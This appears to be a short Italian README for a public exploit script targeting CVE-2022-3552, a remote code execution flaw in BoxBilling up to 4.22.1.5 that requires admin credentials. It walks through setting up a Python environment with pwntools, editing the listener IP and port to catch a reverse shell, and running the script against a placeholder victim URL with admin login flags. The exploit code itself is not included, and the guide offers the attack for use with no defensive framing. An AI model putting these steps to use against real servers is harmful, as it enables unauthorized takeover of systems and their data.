
CVE-2022-3552 RCE con passaggi dettagliati di sfruttamento
Per sfruttare la vulnerabilità in BoxBilling, la versione dovrà essere: "BoxBilling<=4.22.1.5" e avrai bisogno di credenziali amministrative valide.
Se ti trovi nella situazione sopra descritta, ecco i passi da seguire per ottenere il succulento RCE:
Crea un ambiente virtuale Python (Linux)
python3 -m venv .venv
source .venv/bin/activate
Ora installa questa libreria pwntools
pip3 install pwntools
Se lamenta dipendenze mancanti, potresti aver bisogno di installare alcuni pacchetti di sistema:
sudo apt update
sudo apt install python3-pwntools
Nel codice ci sono alcune righe che richiedono modifiche, quelle sono le righe che determinano l'IP di lhost e la porta con cui intendi catturare la shell.
Se hai fatto tutto correttamente, ora dovresti essere in grado di eseguire l'exploit e ottenere una shell! (-d = target, -u = un'email amministrativa valida, -p = la password dell'amministratore valida)
python3 CVE-2022-3552.py -d http://victimtarget.com -u [email protected] -p enterpassword1HERE